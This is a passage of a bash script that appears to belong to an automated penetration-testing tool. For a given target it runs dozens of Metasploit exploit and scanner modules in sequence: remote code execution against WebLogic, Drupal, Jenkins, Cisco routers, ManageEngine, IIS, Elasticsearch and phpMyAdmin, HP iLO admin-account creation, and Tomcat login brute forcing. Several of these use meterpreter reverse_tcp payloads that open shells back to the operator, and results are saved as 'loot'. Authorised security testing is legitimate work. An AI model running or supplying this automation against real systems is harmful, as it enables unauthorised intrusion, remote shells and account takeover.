sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupalgeddon2.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING OSCOMMERCE INSTALLER RCE CVE-2018-2628 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING DRUPAL REST UNSERIALIZE CVE-2019-6340 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use unix/webapp/drupal_restws_unserialize; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING JAVA RMI SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use auxiliary/scanner/misc/java_rmi_server; setg RHOSTS \"$TARGET\"; set RPORT \"$PORT\"; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING PULSE SECURE VPN ARBITRARY FILE DISCLOSURE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use gather/pulse_secure_file_disclosure; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-pulse_secure_file_disclosure.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-pulse_secure_file_disclosure.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-pulse_secure_file_disclosure.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-pulse_secure_file_disclosure.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING CITRIX GATEWAY ARBITRARY CODE EXECUTION VULNERABILITY CVE-2019-19781 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -vk --path-as-is https://$TARGET/vpn/../vpns/ 2>&1 | grep "You don’t have permission to access /vpns/" >/dev/null && echo "VULNERABLE: $TARGET" | tee $LOOT_DIR/output/cve-2019-19781-$TARGET-port$PORT.txt || echo "MITIGATED: $TARGET" | tee $LOOT_DIR/output/cve-2019-19781-$TARGET-port$PORT.txt
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING RAILS FILE EXPOSURE EXPLOIT CVE-2019-5418 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use auxiliary/gather/rails_doubletap_file_read; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-rails_doubletap_file_read.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-rails_doubletap_file_read.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-rails_doubletap_file_read.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-rails_doubletap_file_read.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING CISCO RV320 AND RV325 UNAUTHENTICATED RCE EXPLOIT CVE-2019-1653 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/linux/http/cisco_rv32x_rce; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_rv32x_rce.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_rv32x_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_rv32x_rce.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-cisco_rv32x_rce.raw 2> /dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING JBOSS VULN SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use scanner/http/jboss_vulnscan; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING MANAGEENGINE DESKTOP CENTRAL RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/windows/http/manageengine_connectionid_write; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; set PAYLOAD windows/meterpreter/reverse_tcp; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-manageengine_connectionid_write.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT ENUMERATION $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use scanner/http/tomcat_enum; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_enum.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT MANAGER LOGIN BRUTEFORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/tomcat_mgr_login; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_mgr_login.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING JENKINS ENUMERATION $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use scanner/http/jenkins_enum; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; set TARGETURI /; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_enum.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING JENKINS SCRIPT CONSOLE RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use multi/http/jenkins_script_console; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; setg SSL "$SSL"; set TARGET 0; run; set TARGETURI /; run; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set TARGET 1; run; set PAYLOAD linux/x86/meterpreter/reverse_tcp; run; set TARGET 2; set PAYLOAD linux/x64/meterpreter/reverse_tcp; run; set PAYLOAD linux/x86/meterpreter/reverse_tcp; run; set TARGETURI /; run; set TARGET 1; run; set TARGET 2; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jenkins_script_console.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-hp_ilo_create_admin_account.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ELASTICSEARCH DYNAMIC SCRIPT JAVA INJECTION EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/elasticsearch/script_mvel_rce; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-script_mvel_rce.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING DRUPALGEDDON HTTP PARAMETER SQL INJECTION CVE-2014-3704 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/drupal_drupageddon; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw 2> /dev/null
|
||||
#echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
#echo -e "$OKRED RUNNING MS15-034 HTTP.SYS MEMORY LEAK EXPLOIT $RESET"
|
||||
#echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
#msfconsole -q -x "use scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw
|
||||
#sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.txt 2> /dev/null
|
||||
#rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING GLASSFISH ADMIN TRAVERSAL EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use scanner/http/glassfish_traversal; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-badblue_passthru.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT "$PORT"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOITS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg RHOST "$TARGET"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/htp/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw
|
||||
